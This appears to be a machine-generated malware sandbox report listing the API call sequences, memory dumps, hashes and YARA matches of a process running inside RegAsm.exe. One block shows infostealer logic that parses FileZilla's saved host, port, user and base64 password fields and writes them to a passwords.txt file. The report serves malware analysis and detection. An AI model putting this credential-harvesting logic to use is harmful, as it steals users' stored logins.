                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4054851604-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ec354bd931839d104a6a2e3b95be2c0e842cda3e493e812fffe72628d1d9dbca
                                                                                                                                                                                                                                                                                                  • Instruction ID: f4f16293831a3fdd5782465a1ad6ad91e2b95d5244383983685b33e50c162bcb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec354bd931839d104a6a2e3b95be2c0e842cda3e493e812fffe72628d1d9dbca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23B1B1316083988BDB24CF28C65065FB7E2BFC5318F158E2DE99567791D770E90ACB82
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4291131564-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 32aa950ce91f872d7702ce178019428f87853ac3d51013c830170eaf024b4fe2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E801FF76344312BBF7204F95AC45F56B7ADEF45B61F201026FB49EB2C0D7B5A8108BA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BDFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040BDB0: strchr.MSVCRT ref: 0040BE15
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750,?,75AA5460,00000000,?,?,?,?,?,?,?,00000000,00421101,000000FF), ref: 0040BF51
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00421101,000000FF,?,0040C750,?,00000000,?), ref: 0040BF58
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00421101,000000FF,?,0040C750,?,00000000), ref: 0040BF6D
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00421101,000000FF,?,0040C750,?,00000000,?), ref: 0040BF74
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040BF91
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040BFA2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00421101), ref: 0040BFA9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BFD3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040BFDA
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040BFE6
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040BFED
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C002
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C009
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C02C
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C03A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C041
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C060
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C067
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040C073
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C07A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C08F
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C096
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C0B9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C0C7
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C0CE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C0F6
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C0FD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040C109
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C110
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C125
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C12C
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C14C
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C15D
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C164
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040C16B
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C17D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C184
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040C1A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C1CB
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C1E2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C1E9
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040C1F0
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C1FF
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C206
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C214
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C21B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C237
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C243
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C24A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C277
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C27E
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0040C750), ref: 0040C28A
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040C291
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040C2A7
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2B6
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C2BD
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C331
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0040C341
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C3D0
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040C3D7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3662779188-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9bdaf17dabfef0d877641bcfa9d40975454f3e3d93845ce835c1a6ce1cccb627
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d7be8f87f8b3fd3fa5a8793fbe88b2c50a844962f50f50fc8a48fd6101b6914
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bdaf17dabfef0d877641bcfa9d40975454f3e3d93845ce835c1a6ce1cccb627
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE14676900225EBDB10EBE0DD89EAFBB7DEF45304F00552AFA01B3291DB785905CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(user32,?,6C82E1A5), ref: 6C855606
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(gdi32,?,6C82E1A5), ref: 6C85560F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C855633
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C85563D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C85566C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C85567D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C855696
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C8556B2
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C8556CB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C8556E4
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C8556FD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C855716
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C85572F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C855748
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C855761
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C85577A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C855793
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C8557A8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C8557BD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C8557D5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C8557EA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C8557FF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7de9f934ec18aaa3146e5f6940cc9bf23cc6af654f21b2b55bf3c6887b540a69
                                                                                                                                                                                                                                                                                                  • Instruction ID: fdb433e7effeefcd3de549827b7a7938c891278e7d73b8b8984880aafc923634
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7de9f934ec18aaa3146e5f6940cc9bf23cc6af654f21b2b55bf3c6887b540a69
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F513D716117225B9B329F368E4C92F3AB9AB1728D7504C35E911E2B41FBB0D810DBB0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C80582D), ref: 6C83CC27
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C80582D), ref: 6C83CC3D
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C86FE98,?,?,?,?,?,6C80582D), ref: 6C83CC56
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC6C
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC82
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC98
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CCAE
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C83CCC4
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C83CCDA
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C83CCEC
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C83CCFE
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C83CD14
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C83CD82
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C83CD98
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C83CDAE
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C83CDC4
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C83CDDA
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C83CDF0
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C83CE06
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C83CE1C
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C83CE32
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C83CE48
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C83CE5E
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C83CE74
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C83CE8A
                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strcmp
                                                                                                                                                                                                                                                                                                  • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                                  • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CA06
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA48
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA90
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CAD8
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAE7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB73
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB8B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBA3
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBBB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Soft: FileZilla), ref: 0040CBD3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Host: ), ref: 0040CBE2
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CBF5
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F08), ref: 0040CC04
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC17
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F0C), ref: 0040CC26
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Login: ), ref: 0040CC35
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC48
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F18), ref: 0040CC57
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Password: ), ref: 0040CC66
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC79
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F28), ref: 0040CC88
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F2C), ref: 0040CC97
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040CCDB
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00418083,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCF1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CD42
                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$>kB;kB:kB$Host: $Login: $Password: $Soft: FileZilla$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 368316605-2269495603
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d9acf64c489632148de14d5d3a10a4811b9df8df843a2dcd006c96bbdbf6f3d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9fd3a2253dc7e466d053cb9de484b2d98c4ad2be0fb040733c1b5b0357f32ec9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d9acf64c489632148de14d5d3a10a4811b9df8df843a2dcd006c96bbdbf6f3d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FB19275900218AACB14EBE0DD56FEEBB79AF19304F50046EF511B3192DF786A08CB69
